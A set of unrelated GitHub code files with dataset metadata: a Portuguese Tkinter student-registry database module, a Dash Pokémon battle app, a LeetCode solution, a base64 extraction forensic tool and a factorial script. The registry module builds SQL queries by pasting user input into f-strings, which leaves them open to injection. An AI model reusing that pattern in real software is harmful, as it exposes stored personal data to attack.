banco de dados\n self.conectar_bd()\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_busca.get()}\" OR cpf = \"{self.cpf_busca.get()}\" '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n\n #Preenchendo campos com os dados BD\n self.id.insert(0, self.resultado[0][0])\n self.duracao_inicio.insert(0, self.resultado[0][1])\n self.duracao_fim.set(self.resultado[0][2])\n self.curso.set(self.resultado[0][3])\n self.turno.set(self.resultado[0][4])\n self.escola.insert(0, self.resultado[0][5])\n self.nome_aluno.insert(0, self.resultado[0][6])\n self.data_nascimento.insert(0, self.resultado[0][7])\n self.cpf_aluno.insert(0, self.resultado[0][8])\n self.identidade_aluno.insert(0, self.resultado[0][9])\n self.estado_civil.set(self.resultado[0][10])\n self.email_aluno.insert(0, self.resultado[0][11])\n self.celular_aluno.insert(0, 
self.resultado[0][12])\n self.cep.insert(0, self.resultado[0][13])\n self.endereco.insert(0, self.resultado[0][14])\n self.bairro.insert(0, self.resultado[0][15])\n self.cidade.insert(0, self.resultado[0][16])\n self.pai.insert(0, self.resultado[0][17])\n self.mae.insert(0, self.resultado[0][18])\n self.nome_responsavel.insert(0, self.resultado[0][19])\n self.email_responsavel.insert(0, self.resultado[0][20])\n self.cpf_responsavel.insert(0, self.resultado[0][21])\n self.identidade_responsavel.insert(0, self.resultado[0][22])\n self.celular_responsavel.insert(0, self.resultado[0][23])\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscarAluno(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n print(self.nome_busca.get())\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_busca.get()}\" OR cpf = \"{self.cpf_busca.get()}\" '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n print(self.nome_busca.get())\n #Pegar curso do aluno\n curso = self.resultado[0][3]\n print(curso)\n\n if 'CEFET' in curso:\n #Preenchendo campos com os dados BD\n self.lb_id_aluno_cefet.set(self.resultado[0][0])\n self.lb_curso_aluno_cefet.set(self.resultado[0][3])\n self.lb_turno_aluno_cefet.set(self.resultado[0][4])\n self.lb_escola_aluno_cefet.set(self.resultado[0][5])\n self.lb_nome_aluno_cefet.set(self.resultado[0][6])\n self.lb_cpf_aluno_cefet.set(self.resultado[0][8])\n self.lb_nome_responsavel_cefet.set(self.resultado[0][19])\n self.mensalidade = self.resultado[0][27]\n self.mensalidade = f'{self.mensalidade[14:]}'\n self.mensalidade = self.mensalidade.strip()\n self.lb_mensalidade_aluno_cefet.set(self.mensalidade)\n self.lb_forma_pagamento_aluno_cefet.set(self.resultado[0][29])\n self.lb_status_aluno.set(self.resultado[0][30]) \n else:\n self.lb_id_aluno_enem.set(self.resultado[0][0])\n self.lb_curso_aluno_enem.set(self.resultado[0][3])\n self.lb_turno_aluno_enem.set(self.resultado[0][4])\n self.lb_escola_aluno_enem.set(self.resultado[0][5])\n self.lb_nome_aluno_enem.set(self.resultado[0][6])\n self.lb_cpf_aluno_enem.set(self.resultado[0][8])\n self.lb_nome_responsavel_enem.set(self.resultado[0][19])\n self.mensalidade = self.resultado[0][27]\n self.mensalidade = f'{self.mensalidade[14:]}'\n self.mensalidade = self.mensalidade.strip()\n self.lb_mensalidade_aluno_enem.set(self.mensalidade)\n self.lb_forma_pagamento_aluno_enem.set(self.resultado[0][29])\n self.lb_status_aluno.set(self.resultado[0][30])\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscarUltimoMesPago(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n print(self.nome_busca.get())\n\n try:\n #Comando SQL para buscar usuario\n self.comando = f'SELECT * FROM cadastro1 WHERE nome_aluno = \"{self.nome_busca.get()}\" OR cpf = \"{self.cpf_busca.get()}\" '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n print(self.nome_busca.get())\n\n #Preenchendo campos com os dados BD\n self.mes = self.resultado[0][28]\n\n return self.mes\n\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()\n\n\n def buscarAlunoNaoPago(self):\n\n #Conectando com o banco de dados\n self.conectar_bd()\n\n try:\n #Comando 
SQL para buscar usuario\n self.comando = f'SELECT id, nome_aluno, curso, plano_2 FROM cursomaxter.cadastro1 WHERE status = \"NÃO PAGO\" AND atual = \"1\"; '\n self.cursor.execute(self.comando)\n self.resultado = self.cursor.fetchall()\n\n self.listaAlunoNaoPago = []\n\n #Preenchendo campos com os dados BD\n for i in self.resultado:\n print(i)\n self.listaAlunoNaoPago.append(i)\n\n print(self.listaAlunoNaoPago)\n \n return self.listaAlunoNaoPago\n\n except:\n messagebox.showerror('Curso Maxter', 'ERRO!\\nNão foi possivel buscar aluno.')\n\n\n #Fechar banco de dados\n self.desconectar_bd()","repo_name":"lucasaaz/Programa_Interface_Grafica_Python","sub_path":"programa/bancoDados.py","file_name":"bancoDados.py","file_ext":"py","file_size_in_byte":13722,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39547855759","text":"from dash import html, dcc, State\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output\nfrom app import app\nfrom pages import poke_choose, battle_page, create_poke\nfrom components import navbar\nfrom pokemon import Pokemon\nfrom battle import game_round\nfrom driver import moves, pokemons, add_poke\n\n\n# Define the navbar\nnav = navbar.Navbar()\n\n# Define the index page layout\napp.layout = html.Div([\n # placeholder\n html.Div(id='hidden-div', style={'display': 'none'}),\n\n # stored values\n dcc.Store(id='error', data=False),\n dcc.Store(id=\"player-pokemon\", storage_type=\"session\"),\n dcc.Store(id=\"player-moves\", storage_type=\"session\"),\n dcc.Store(id=\"opponent-pokemon\", storage_type=\"session\"),\n dcc.Store(id=\"won\", data=False, storage_type=\"session\"),\n dcc.Store(id=\"winner\", data='', storage_type=\"session\"),\n dcc.Store(id=\"start-stats\", data=None, storage_type=\"session\"),\n\n dcc.Location(id='url', refresh=False),\n nav,\n html.Div(id='page-content', children=[]),\n\n # selection error for game start\n dbc.Modal([\n dbc.ModalHeader(\n dbc.ModalTitle(\"Invalid Selection\")\n ),\n dbc.ModalBody(children='Too many moves selected', id='error-message'),\n dbc.ModalFooter()], id='select-error', is_open=False)\n], style={'backgroundColor': '#fcfcfc', 'color': '#414141'})\n\n\n@app.callback(Output('page-content', 'children'),\n Input('url', 'pathname')\n)\ndef display_page(pathname):\n \"\"\"\n define page layout based on page url\n \"\"\"\n if pathname == '/':\n return poke_choose.layout\n if pathname == '/battle':\n return battle_page.layout\n if pathname == '/create':\n return create_poke.layout\n else: # if redirected to unknown link\n return \"404 Page Error! 
Please choose a link\"\n\n\n@app.callback(\n Output('move-options', 'options'),\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef get_move_options(chosen):\n \"\"\"\n display moveset for chosen pokemon\n :param chosen: name of chosen pokemon\n :return: moveset to display\n \"\"\"\n options = []\n if chosen:\n for move in pokemons[chosen].moveset:\n options.append(moves[move].name)\n\n return options\n\n\n@app.callback(\n Output('move-options', 'value'),\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef reset_move_options(chosen):\n \"\"\" reset chosen moves on new pokemon select \"\"\"\n return []\n\n\n# TODO: add stats\n@app.callback(\n Output('select-img', 'src'),\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef select_stats(chosen):\n \"\"\" get image and stats for pokemon when clicked on select screen\"\"\"\n return pokemons[chosen].picture\n\n\n@app.callback(\n [Output('poke-types', 'children'),\n Output('poke-hp', 'children'),\n Output('poke-speed', 'children'),\n Output('poke-attack', 'children'),\n Output('poke-defense', 'children'),\n Output('poke-spattack', 'children'),\n Output('poke-spdefense', 'children')],\n Input('pokemon-options', 'value'),\n prevent_initial_call=True\n)\ndef select_page_stats(poke):\n \"\"\" gets stats for current selected pokemon on select page \"\"\"\n pokemon = pokemons[poke]\n\n return 'Types: ' + '/'.join(pokemon.types), 'hP: ' + str(pokemon.health), 'Speed: ' + str(pokemon.speed), \\\n 'Attack: ' + str(pokemon.attack), 'Defense: ' + str(pokemon.defense), \\\n 'Special Attack: ' + str(pokemon.spattack), 'Special Defense: ' + str(pokemon.spdefense)\n\n\n@app.callback(\n [Output('player-pokemon', 'data'),\n Output('player-moves', 'data')],\n [Input('start-game-button', 'n_clicks'),\n Input('pokemon-options', 'value'),\n Input('move-options', 'value')],\n prevent_initial_call=True\n)\ndef pokemon_chosen(started, poke_choice, moves_choice):\n \"\"\"\n store selected pokemon and moveset for game play\n :param started: int; signifies start game button clicked\n :param poke_choice: str; selected pokemon\n :param moves_choice: lst; selected moves\n :return:\n \"\"\"\n if started:\n return poke_choice, moves_choice\n\n return None, None\n\n\n@app.callback(\n Output('opponent-pokemon', 'data'),\n Input('player-pokemon', 'data'),\n prevent_initial_call=True\n)\ndef get_opponent(player):\n \"\"\" get opponent on game start \"\"\"\n if player:\n return pokemons[player].random_opp(pokemons).name\n\n return None\n\n\n@app.callback(\n [Output('start-game-button', 'disabled'),\n Output('select-error', 'is_open')],\n Input('move-options', 'value'),\n prevent_initial_call=True\n)\ndef enable_start(moves_chosen):\n \"\"\"\n enable start button if choices are valid\n :param moves_chosen: lst; moves selected\n :return: - if start game button is disabled\n - if error modal is open\n \"\"\"\n if moves_chosen and len(moves_chosen) > 4:\n return True, True\n elif moves_chosen:\n return False, False\n\n return True, False\n\n\n@app.callback(\n [Output('opponent-name', 'children'),\n Output('player-name', 'children'),\n Output('move-header', 'children')],\n [Input('player-pokemon', 'data'),\n Input('opponent-pokemon', 'data')]\n)\ndef add_names(player_name, opp_name):\n \"\"\" places selected pokemon names in interface page \"\"\"\n return opp_name, player_name, f'What will {player_name} do?'\n\n\n@app.callback(\n Output('start-stats', 'data'),\n [Input('player-pokemon', 'data'),\n Input('opponent-pokemon', 
'data')],\n prevent_initial_call=True\n)\ndef save_orig(play_name, opp_name):\n \"\"\" Saves the original stats of the pokemon and opponent\n :param play_name: pokemon object; player's chosen pokemon\n :param opp_name: pokemon object; opponent's pokemon\n \"\"\"\n if play_name and opp_name:\n player = pokemons[play_name]\n opp = pokemons[opp_name]\n return {\"player\": [player.attack, player.defense, player.spattack, player.spdefense, player.speed],\n \"opponent\": [opp.attack, opp.defense, opp.spattack, opp.spdefense, opp.speed]}\n \n return {}\n\n\n# TODO: opponent sprite\n@app.callback(\n [Output('player-sprite', 'src'),\n Output('opponent-sprite', 'src')],\n [Input('player-pokemon', 'data'),\n Input('opponent-pokemon', 'data')]\n)\ndef get_sprites(player_name, opp_name):\n \"\"\" places selected pokemon sprites in interface page \"\"\"\n return pokemons[player_name].picture, pokemons[opp_name].picture\n\n\n@app.callback(\n [Output('player-describe', 'children'),\n Output('player-types', 'children'),\n Output('player-hp', 'children'),\n Output('player-status', 'children'),\n Output('player-speed', 'children'),\n Output('player-attack', 'children'),\n Output('player-defense', 'children'),\n Output('player-spattack', 'children'),\n Output('player-spdefense', 'children')],\n [Input('player-pokemon', 'data'),\n Input('game-log', 'children')],\n prevent_initial_call=True\n)\ndef player_stat_box(player_name, log):\n \"\"\"\n get player pokemon description to display\n Args:\n player_name: player pokemon\n log: current game history (will cause to update as rounds are played)\n\n Returns: player stats to display\n\n \"\"\"\n pokemon = pokemons[player_name]\n status = 'None'\n\n # display health as pos\n if pokemon.health > 0:\n health = pokemon.health\n else:\n health = 0\n\n # check for status effects\n if list(pokemon.start_status.keys()) + list(pokemon.end_status.keys()):\n ls = list(pokemon.start_status.keys()) + list(pokemon.end_status.keys())\n status = ls[0]\n\n return player_name, '/'.join(pokemon.types), 'hP: ' + str(health), 'Status Condition: ' + status, \\\n 'Speed: ' + str(pokemon.speed), 'Attack: ' + str(pokemon.attack), 'Defense: ' + str(pokemon.defense), \\\n 'Special Attack: ' + str(pokemon.spattack), 'Special Defense: ' + str(pokemon.spdefense)\n\n\n@app.callback(\n [Output('opp-describe', 'children'),\n Output('opp-types', 'children'),\n Output('opp-hp', 'children'),\n Output('opp-status', 'children'),\n Output('opp-speed', 'children'),\n Output('opp-attack', 'children'),\n Output('opp-defense', 'children'),\n Output('opp-spattack', 'children'),\n Output('opp-spdefense', 'children')],\n [Input('opponent-pokemon', 'data'),\n Input('game-log', 'children')],\n prevent_initial_call=True\n)\ndef opp_stat_box(opp_name, log):\n \"\"\"\n get opponent pokemon description to display\n Args:\n opp_name: opponent pokemon\n log: current game history (will cause to update as rounds are played)\n\n Returns: opponent stats to display\n \"\"\"\n pokemon = pokemons[opp_name]\n status = 'None'\n\n # display health as pos\n if pokemon.health > 0:\n health = pokemon.health\n else:\n health = 0\n\n if list(pokemon.start_status.keys()) + list(pokemon.end_status.keys()):\n ls = list(pokemon.start_status.keys()) + list(pokemon.end_status.keys())\n status = ls[0]\n\n return opp_name, '/'.join(pokemon.types), 'hP: ' + str(health), 'Status Condition: ' + status, \\\n 'Speed: ' + str(pokemon.speed), 'Attack: ' + str(pokemon.attack), 'Defense: ' + str(pokemon.defense), \\\n 'Special Attack: ' + 
str(pokemon.spattack), 'Special Defense: ' + str(pokemon.spdefense)\n\n\n@app.callback(\n    [Output('move-1', 'children'),\n     Output('move-2', 'children'),\n     Output('move-3', 'children'),\n     Output('move-4', 'children'),\n     Output('move-1', 'title'),\n     Output('move-2', 'title'),\n     Output('move-3', 'title'),\n     Output('move-4', 'title'),],\n    Input('player-moves', 'data')\n)\ndef get_moves(moves_chosen):\n    \"\"\" places selected pokemon moves in interface page \"\"\"\n\n    # number of missing moves\n    blank = 4 - len(moves_chosen)\n\n    moves_chosen = moves_chosen + ['NO MOVE'] * blank\n    return moves_chosen + [moves[_.lower()].desc if _ != 'NO MOVE' else None for _ in moves_chosen]\n\n\n@app.callback(\n    [Output('move-1', 'disabled'),\n     Output('move-2', 'disabled'),\n     Output('move-3', 'disabled'),\n     Output('move-4', 'disabled')],\n    [Input('move-1', 'children'),\n     Input('move-2', 'children'),\n     Input('move-3', 'children'),\n     Input('move-4', 'children'),\n     Input('won', 'data')]\n)\ndef disable_moves(move1, move2, move3, move4, won):\n    \"\"\" disable inactive moves (when less than 4 moves have been selected) \"\"\"\n    if won:\n        return [True] * 4\n\n    return [True if move == 'NO MOVE' else False for move in [move1, move2, move3, move4]]\n\n@app.callback(\n    [Output('create_name', 'value'),\n     Output('create_type', 'value'),\n     Output('create_health', 'value'),\n     Output('create_attack', 'value'),\n     Output('create_defense', 'value'),\n     Output('create_spattack', 'value'),\n     Output('create_spdefense', 'value'),\n     Output('create_speed', 'value'),\n     Output('create_moves', 'value'),\n     Output('create_image', 'value')],\n    [Input('submitted', 'n_clicks')],\n    [State('create_name', 'value'),\n     State('create_type', 'value'),\n     State('create_health', 'value'),\n     State('create_attack', 'value'),\n     State('create_defense', 'value'),\n     State('create_spattack', 'value'),\n     State('create_spdefense', 'value'),\n     State('create_speed', 'value'),\n     State('create_moves', 'value'),\n     State('create_image', 'value')],\n    prevent_initial_call=True\n)\ndef create_pokemon(submit, name, types, health, att, defe, spat, spdef, speed, moveset, img):\n    \"\"\" in progress : adds user created pokemon to the game \"\"\"\n    if submit:\n        if name not in pokemons:\n            new_poke = Pokemon(name, types, health, att, defe, spat, spdef, speed, img, moveset)\n            # pokemons[new_poke.name] = new_poke\n            add_poke(new_poke)\n            print(pokemons)\n\n    return '', [], '', '', '', '', '', '', [], ''\n\n\n@app.callback(\n    Output('pokemon-options', 'options'),\n    Input('new-game-button', 'n_clicks')\n)\ndef new_poke_added(new):\n    print('new!', pokemons)\n    return [{'label': [html.Img(src=pokemon.picture, style={'height': '70px'}),\n\t\t\t\t\t\thtml.Span(name)],\n\t\t\t'value': name} for name, pokemon in pokemons.items()]\n\n\n@app.callback(\n    [Output('won', 'data'),\n     Output('winner', 'data'),\n     Output('player-hp-bar', 'style'),\n     Output('opp-hp-bar', 'style'),\n     Output('game-log', 'children')],\n    [Input('move-1', 'n_clicks_timestamp'),\n     Input('move-2', 'n_clicks_timestamp'),\n     Input('move-3', 'n_clicks_timestamp'),\n     Input('move-4', 'n_clicks_timestamp')],\n    [State('player-pokemon', 'data'),\n     State('opponent-pokemon', 'data'),\n     State('player-moves', 'data'),\n     State('game-log', 'children')],\n    prevent_initial_call=True\n)\ndef play_round(m1, m2, m3, m4, player, opp, moveset, curr_log):\n    \"\"\"\n    runs a battle round\n    Args:\n        m1-4: int; click timestamps of move buttons 1 through 4\n        player: str; name of the player's pokemon\n        opp: str; name of the opponent's pokemon\n        moveset: 
list of str; moves that player's pokemon can learn\n        curr_log: current contents of the game log\n\n    Returns: won, winner: to check if game has been won and by who\n             player-hp-bar, opp-hp-bar, game-log: stats to display on dash interface\n\n    \"\"\"\n    if m1 or m2 or m3 or m4:\n        won = False\n        winner = ''\n        opp_move = pokemons[opp].choose_random_move().lower()\n\n        # get chosen move\n        click_times = [m1, m2, m3, m4]\n        move_index = click_times.index(max(click_times))\n        move_chosen = moveset[move_index].lower()\n\n        log = game_round(pokemons[player], pokemons[opp], moves[move_chosen], moves[opp_move])\n\n        # health percents\n        player_hp_pct = (pokemons[player].health / pokemons[player].max_health) * 100\n        opp_hp_pct = (pokemons[opp].health / pokemons[opp].max_health) * 100\n\n        # check if pokemon fainted\n        if player_hp_pct > 0:\n            player_health = str(player_hp_pct) + '%'\n        else:\n            player_health = '0%'\n            won = True\n            winner = opp\n        if opp_hp_pct > 0:\n            opp_health = str(opp_hp_pct) + '%'\n        else:\n            opp_health = '0%'\n            won = True\n            winner = player\n\n        # append this round to the running game log\n        if curr_log:\n            log = html.P([curr_log, html.Br(), log])\n        else:\n            log = html.P([log, html.Br()])\n\n        return won, winner, {'width': player_health, 'height': '100%', 'backgroundColor': 'green',\n                             'borderRadius': '3px'}, {'width': opp_health, 'height': '100%',\n                                                      'backgroundColor': 'green', 'borderRadius': '3px'}, log\n\n    return False, '', {'width': '100%', 'height': '100%', 'backgroundColor': 'green', 'borderRadius': '3px'}, \\\n           {'width': '100%', 'height': '100%', 'backgroundColor': 'green', 'borderRadius': '3px'}, curr_log\n\n\n@app.callback(\n    [Output('win-text', 'children'),\n     Output('win-text', 'style'),\n     Output('win-text-box', 'style')],\n    [Input('won', 'data'),\n     Input('winner', 'data')]\n)\ndef show_win(won, winner):\n    \"\"\" display winner and style win statement \"\"\"\n    if won:\n        return winner + ' Wins!', {'color': '#414141', 'opacity': '1', 'fontSize': '50px', 'margin': '15vh 22vw',\n                                   'textAlign': 'center'}, \\\n               {'backgroundColor': 'white', 'opacity': '0.4', 'height': '50vh', 'width': '55vw', 'position': 'absolute'}\n\n    return '', {}, {}\n\n\n@app.callback(\n    Output('hidden-div', 'children'),\n    Input('new-game-button', 'n_clicks'),\n    [State('player-pokemon', 'data'),\n     State('opponent-pokemon', 'data'),\n     State('start-stats', 'data')],\n    prevent_initial_call=True\n)\ndef reset_pokes(new, player, opp, stats):\n    \"\"\"\n    Resets the pokemon stats of each pokemon\n    Args:\n        new: triggers function on new game opened\n        player: name of player pokemon\n        opp: name of opponent pokemon\n        stats: original stats to reset to\n\n    Returns: nothing. resets pokemon objects\n\n    \"\"\"\n    if stats:\n        pokemons[player].wipe(stats['player'])\n        pokemons[opp].wipe(stats['opponent'])\n    return ''\n\n\n# Run the app on localhost:8050\nif __name__ == '__main__':\n    app.run_server(debug=True)","repo_name":"kaldenh/pokemon_simulator","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":16255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10077003928","text":"# encoding=utf8\n\n\n'''\n392. Is Subsequence\nGiven strings s and t, determine whether s is a subsequence of t.\n\nYou may assume that s and t contain only lowercase English letters. String t may be very long (length ~= 500,000), while s is a short string (length <= 100).\n\nA subsequence of a string is a new string formed from the original string by deleting some (possibly no) characters without changing the relative positions of the remaining characters. (For example, \"ace\" is a subsequence of \"abcde\", while \"aec\" is not.)\n\nExample 1:\ns = \"abc\", t = \"ahbgdc\"\n\nreturns true.\n\nExample 2:\ns = \"axc\", t = \"ahbgdc\"\n\nreturns false.\n\nFollow-up:\nIf there are lots of incoming strings S, say S1, S2, ... , Sk where k >= 1 billion, and you need to check one by one whether each is a subsequence of T, how would you change the code?\n\n\n392. Is Subsequence\nGiven a string s and a string t, check if s is subsequence of t.\n\nA subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n\nFollow up:\nIf there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?\n\nCredits:\nSpecial thanks to @pbrother for adding this problem and creating all test cases.\n\n\n\nExample 1:\n\nInput: s = \"abc\", t = \"ahbgdc\"\nOutput: true\nExample 2:\n\nInput: s = \"axc\", t = \"ahbgdc\"\nOutput: false\n\n\nConstraints:\n\n0 <= s.length <= 100\n0 <= t.length <= 10^4\nBoth strings consists only of lowercase characters.\n'''\n\n\nclass Solution(object):\n    def isSubsequence(self, s, t):\n        \"\"\"\n        :type s: str\n        :type t: str\n        :rtype: bool\n        \"\"\"\n        if not s:\n            return True\n        i, j = 0, 0\n        while i < len(s) and j < len(t):\n            if t[j] == s[i]:\n                i += 1\n            j += 1\n            if i == len(s):\n                return True\n        return i == len(s)
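\n\n# Follow-up sketch (added; not from the original author, which only poses the\n# question): with many queries against one t, preprocess t once so each s costs\n# O(len(s) * log len(t)) via binary search over per-character index lists.\n'''\nimport bisect\nfrom collections import defaultdict\n\ndef make_checker(t):\n    # map each character to the sorted list of its positions in t\n    pos = defaultdict(list)\n    for idx, ch in enumerate(t):\n        pos[ch].append(idx)\n    def check(s):\n        cur = 0\n        for ch in s:\n            # first occurrence of ch at index >= cur\n            i = bisect.bisect_left(pos[ch], cur)\n            if i == len(pos[ch]):\n                return False\n            cur = pos[ch][i] + 1\n        return True\n    return check\n'''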
\n\n# golang solutions\n\n'''\nfunc isSubsequence(s string, t string) bool {\n\n    i, j := 0, 0\n    for i < len(s) && j < len(t){\n        if s[i] == t[j]{\n            i++\n        }\n        j++\n    }\n    if i == len(s){\n        return true\n    }\n    return false\n\n}\n'''\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/binary_search/leetcode-392-IsSubsequence.py","file_name":"leetcode-392-IsSubsequence.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32429370628","text":"#!/usr/bin/env python\n\n__description__ = 'Extract base64 strings from file'\n__author__ = 'Didier Stevens'\n__version__ = '0.0.1'\n__date__ = '2015/07/01'\n\n\"\"\"\n\nSource code put in public domain by Didier Stevens, no Copyright\nhttps://DidierStevens.com\nUse at your own risk\n\nHistory:\n  2015/06/30: start\n  2015/07/01: added header\n\nTodo:\n\"\"\"\n\nimport optparse\nimport sys\nimport os\nimport zipfile\nimport cStringIO\nimport binascii\nimport textwrap\nimport re\nimport hashlib\n# glob and collections are needed by ExpandFilenameArguments below\nimport glob\nimport collections\n\ndumplinelength = 16\nMALWARE_PASSWORD = 'infected'\n\ndef PrintManual():\n    manual = '''\nManual:\n\n'''\n    for line in manual.split('\\n'):\n        print(textwrap.fill(line))\n\n#Convert 2 Bytes If Python 3\ndef C2BIP3(string):\n    if sys.version_info[0] > 2:\n        return bytes([ord(x) for x in string])\n    else:\n        return string\n\n# CIC: Call If Callable\ndef CIC(expression):\n    if callable(expression):\n        return expression()\n    else:\n        return expression\n\n# IFF: IF Function\ndef IFF(expression, valueTrue, valueFalse):\n    if expression:\n        return CIC(valueTrue)\n    else:\n        return CIC(valueFalse)\n\ndef File2String(filename):\n    try:\n        f = open(filename, 'rb')\n    except:\n        return None\n    try:\n        return f.read()\n    except:\n        return None\n    finally:\n        f.close()\n\nclass cDumpStream():\n    def __init__(self):\n        self.text = ''\n\n    def Addline(self, line):\n        if line != '':\n            self.text += line + '\\n'\n\n    def Content(self):\n        return self.text\n\ndef HexDump(data):\n    oDumpStream = cDumpStream()\n    hexDump = ''\n    for i, b in enumerate(data):\n        if i % dumplinelength == 0 and hexDump != '':\n            oDumpStream.Addline(hexDump)\n            hexDump = ''\n        hexDump += IFF(hexDump == '', '', ' ') + '%02X' % ord(b)\n    oDumpStream.Addline(hexDump)\n    return oDumpStream.Content()\n\ndef CombineHexAscii(hexDump, asciiDump):\n    if hexDump == '':\n        
return ''\n return hexDump + ' ' + (' ' * (3 * (dumplinelength - len(asciiDump)))) + asciiDump\n\ndef HexAsciiDump(data):\n oDumpStream = cDumpStream()\n hexDump = ''\n asciiDump = ''\n for i, b in enumerate(data):\n if i % dumplinelength == 0:\n if hexDump != '':\n oDumpStream.Addline(CombineHexAscii(hexDump, asciiDump))\n hexDump = '%08X:' % i\n asciiDump = ''\n hexDump+= ' %02X' % ord(b)\n asciiDump += IFF(ord(b) >= 32, b, '.')\n oDumpStream.Addline(CombineHexAscii(hexDump, asciiDump))\n return oDumpStream.Content()\n\n#Fix for http://bugs.python.org/issue11395\ndef StdoutWriteChunked(data):\n while data != '':\n sys.stdout.write(data[0:10000])\n try:\n sys.stdout.flush()\n except IOError:\n return\n data = data[10000:]\n\ndef IfWIN32SetBinary(io):\n if sys.platform == 'win32':\n import msvcrt\n msvcrt.setmode(io.fileno(), os.O_BINARY)\n\ndef File2Strings(filename):\n try:\n f = open(filename, 'r')\n except:\n return None\n try:\n return map(lambda line:line.rstrip('\\n'), f.readlines())\n except:\n return None\n finally:\n f.close()\n\ndef ProcessAt(argument):\n if argument.startswith('@'):\n strings = File2Strings(argument[1:])\n if strings == None:\n raise Exception('Error reading %s' % argument)\n else:\n return strings\n else:\n return [argument]\n\ndef ExpandFilenameArguments(filenames):\n return list(collections.OrderedDict.fromkeys(sum(map(glob.glob, sum(map(ProcessAt, filenames), [])), [])))\n\ndef AsciiDump(data):\n return ''.join([IFF(ord(b) >= 32, b, '.') for b in data])\n\ndef BASE64Dump(filename, options):\n if filename == '':\n IfWIN32SetBinary(sys.stdin)\n oStringIO = cStringIO.StringIO(sys.stdin.read())\n elif filename.lower().endswith('.zip'):\n oZipfile = zipfile.ZipFile(filename, 'r')\n oZipContent = oZipfile.open(oZipfile.infolist()[0], 'r', C2BIP3(MALWARE_PASSWORD))\n oStringIO = cStringIO.StringIO(oZipContent.read())\n oZipContent.close()\n oZipfile.close()\n else:\n oStringIO = cStringIO.StringIO(open(filename, 'rb').read())\n\n if options.dump:\n DumpFunction = lambda x:x\n IfWIN32SetBinary(sys.stdout)\n elif options.hexdump:\n DumpFunction = HexDump\n else:\n DumpFunction = HexAsciiDump\n\n if options.select == '':\n formatString = '%-2s %-7s %-16s %-16s %-32s'\n columnNames = ('ID', 'Size', 'BASE64', 'Decoded', 'MD5 decoded')\n print(formatString % columnNames)\n print(formatString % tuple(['-' * len(s) for s in columnNames]))\n\n counter = 1\n data = oStringIO.read()\n for base64string in re.findall('[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/]+={0,2}', data):\n if len(base64string) % 4 == 0:\n try:\n base64data = binascii.a2b_base64(base64string)\n except:\n break\n if options.select == '':\n print('%2d: %7d %-16s %-16s %s' % (counter, len(base64string), base64string[0:16], AsciiDump(base64data[0:16]), hashlib.md5(base64data).hexdigest()))\n elif ('%s' % counter) == options.select:\n StdoutWriteChunked(DumpFunction(base64data))\n counter += 1\n\n return 0\n\ndef Main():\n oParser = optparse.OptionParser(usage='usage: %prog [options] [file]\\n' + __description__, version='%prog ' + __version__)\n oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')\n oParser.add_option('-s', '--select', default='', help='select item nr for dumping (a for all)')\n oParser.add_option('-d', '--dump', action='store_true', default=False, help='perform dump')\n oParser.add_option('-x', '--hexdump', action='store_true', default=False, help='perform hex dump')\n oParser.add_option('-a', '--asciidump', action='store_true', 
default=False, help='perform ascii dump')\n (options, args) = oParser.parse_args()\n\n if options.man:\n oParser.print_help()\n PrintManual()\n return 0\n\n if len(args) > 1:\n oParser.print_help()\n print('')\n print(' Source code put in the public domain by Didier Stevens, no Copyright')\n print(' Use at your own risk')\n print(' https://DidierStevens.com')\n return 0\n elif len(args) == 0:\n return BASE64Dump('', options)\n else:\n return BASE64Dump(args[0], options)\n\nif __name__ == '__main__':\n sys.exit(Main())\n","repo_name":"ryanmrestivo/red-team","sub_path":"Forensic-Reverse-Engineering-Password-Attacks-&-Analysis/_Password_Attacks_Decode_&_Hashes/base64dump.py","file_name":"base64dump.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"9709977811","text":"def factorial(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * factorial(n - 1)\r\n\r\n\r\nN = int(input())\r\n\r\nif N == 0:\r\n print(\"NO\")\r\n exit(0)\r\nelse:\r\n for i in range(20, -1, -1):\r\n if N >= factorial(i):\r\n N -= factorial(i)\r\nif N == 0:\r\n print(\"YES\")\r\nelse:\r\n print(\"NO\")","repo_name":"skh990427/Baekjoon","sub_path":"백준/Silver/2057. 팩토리얼 분해/팩토리얼 분해.py","file_name":"팩토리얼 